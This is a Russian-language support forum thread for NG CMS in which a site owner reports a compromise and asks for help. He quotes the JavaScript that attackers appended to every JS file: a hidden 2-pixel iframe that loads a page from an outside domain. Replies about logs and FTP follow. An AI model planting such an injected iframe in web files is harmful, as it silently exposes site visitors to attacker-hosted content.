Next Generation CMS :: Форум поддержки

Заинтересовала наша система? Тогда этот форум для Вас!

rss

Вы не зашли.

Объявление

#1 2012-12-24 15:43:09

Nushaba
Пользователь
Зарегистрирован: 2009-11-09
Сообщений: 276
Рейтинг :   
Профиль

Взломали сайт

Всем привет. Столкнулся с проблемой, был взломан сайт 19.11.2012
Были модифицированы все js файлы путём добавления кода следующего содержания:

Код:

/*0fead1*/
(function()
{
 var a = document.createElement('iframe');
 a.src = 'http://www.real.dp.ua/img/upload/item/207/stats.php';
 a.style.position = 'absolute';
 a.style.border = '0';
 a.style.height = '2px';
 a.style.width = '2px';
 a.style.left = '1px';
 a.style.top = '1px';
 if(!document.getElementById('mira'))
 {
 document.write('<div id=\'mira\'></div>');
 document.getElementById('mira').appendChild(a);
 }
})();
/*/0fead1*/

Не могу понять как такое произошло. Я бы мог погрешить на то, что спалил пароль от хостинга, но тогда было бы логично что заразили бы все поддомены мои тестовые, а заразили только один, значит не спалили пароль. Взломали только тот поддомен, где стояла ngcms 0.9.3 + SVN [SVN1047+] Ещё более нелогичным можно посчитать тот факт, что взломали выключенный к показу посетителям сайт, то есть из админки я выключил его, правда не помню когда, до взлома или уже после... Как это можно проверить?

Напрашивается вывод что есть какая то уязвимость в самом движке. Встречался кто с подобной проблемой и как лечить? Сайт: o.nushaba.ru

Неактивен

 

#2 2012-12-24 16:17:10

easmik
Модератор
Откуда: Анталья
Зарегистрирован: 2011-02-01
Сообщений: 999
Рейтинг :   37 
Профиль  Вебсайт

Re: Взломали сайт

Nushaba, судя по коду что тут стоит эти хакеры ломанули 9620 сайтов на НГ столько нету


Все сайты, что могут быть сделаны на ng cms, должны быть сделаны на ng cms.

Расширив границы сознания, мы открываем новые горизонты жизни.

Неактивен

 

#3 2012-12-24 16:50:10

Nushaba
Пользователь
Зарегистрирован: 2009-11-09
Сообщений: 276
Рейтинг :   
Профиль

Re: Взломали сайт

easmik, очевидно ломали скриптом, или каким то софтом который автоматизировал процесс, иначе зачем ещё ломать сайт который выключен. Но всё же остаются вопросы, почему взломали именно сайт с ngcms внутри а не все остальные на хостинге, ну или вопрос как это сделали, тогда будет понятно что то. В общем думаю есть дыра в движке, так как аналогичный взлом был около года назад, тогда я не стал писать.

Неактивен

 

#4 2012-12-24 18:45:57

infinity237
Модератор
Откуда: Russia, Moscow
Зарегистрирован: 2008-11-09
Сообщений: 2674
Рейтинг :   174 
Профиль  Вебсайт

Re: Взломали сайт

Логи то смотрели?

https://www.google.ru/search?client=ope … el=suggest

Отредактированно infinity237 (2012-12-24 18:57:02)

Неактивен

 

#5 2012-12-25 01:46:25

dampel
Пользователь
Зарегистрирован: 2011-09-26
Сообщений: 52
Рейтинг :   
Профиль

Re: Взломали сайт

Смотрите аксесс логи в то время, когда примерно вас взломали.
ftp используете?

Отредактированно dampel (2012-12-25 01:47:39)

Неактивен

 

#6 2012-12-25 08:48:54

Nushaba
Пользователь
Зарегистрирован: 2009-11-09
Сообщений: 276
Рейтинг :   
Профиль

Re: Взломали сайт

Таких старых логов нету, FTP использую. Но FTP поставляет хостер. Скорее всего не FTP взломали, я уже писал что остальные сайты на том же FTP не тронули.

Отредактированно Nushaba (2012-12-25 08:58:28)

Неактивен

 

#7 2012-12-25 10:27:55

infinity237
Модератор
Откуда: Russia, Moscow
Зарегистрирован: 2008-11-09
Сообщений: 2674
Рейтинг :   174 
Профиль  Вебсайт

Re: Взломали сайт

Ну и как ты теперь хочешь чтобы мы тебе сказали где бага? big_smile

Неактивен

 

#8 2012-12-25 11:33:46

Nushaba
Пользователь
Зарегистрирован: 2009-11-09
Сообщений: 276
Рейтинг :   
Профиль

Re: Взломали сайт

infinity237, вдруг телепаты существуют! ) Ладно, тогда закрываем тему.

Неактивен

 

#9 2013-10-02 18:01:03

Albert
Новичок
Зарегистрирован: 2013-10-02
Сообщений: 1
Рейтинг :   
Профиль

Re: Взломали сайт

здравствуйте я потерял пароль для входа на сайт помогите как войти на сайт? Но мне пофиг на ngcms и я не когда не поставлю ссылку на эту CMS.

Неактивен

 

#10 2013-10-02 18:24:46

vip
Aдминистратор
Откуда: Russian Federation, Moscow
Зарегистрирован: 2011-03-23
Сообщений: 1110
Рейтинг :   200 
Профиль  Вебсайт

Re: Взломали сайт

Albert, http://ngcms.ru/forum/viewtopic.php?pid=35992#p35992


Free Templates | Бесплатные шаблоны  Мы открылись! smile
Dropbox.com Облачное хранилище данных.
_____________________________
Для благодарностей WebMoney R773133692073

Неактивен

 

Board footer

Powered by FluxBB

[ Generated in 0.013 seconds, 19 queries executed ]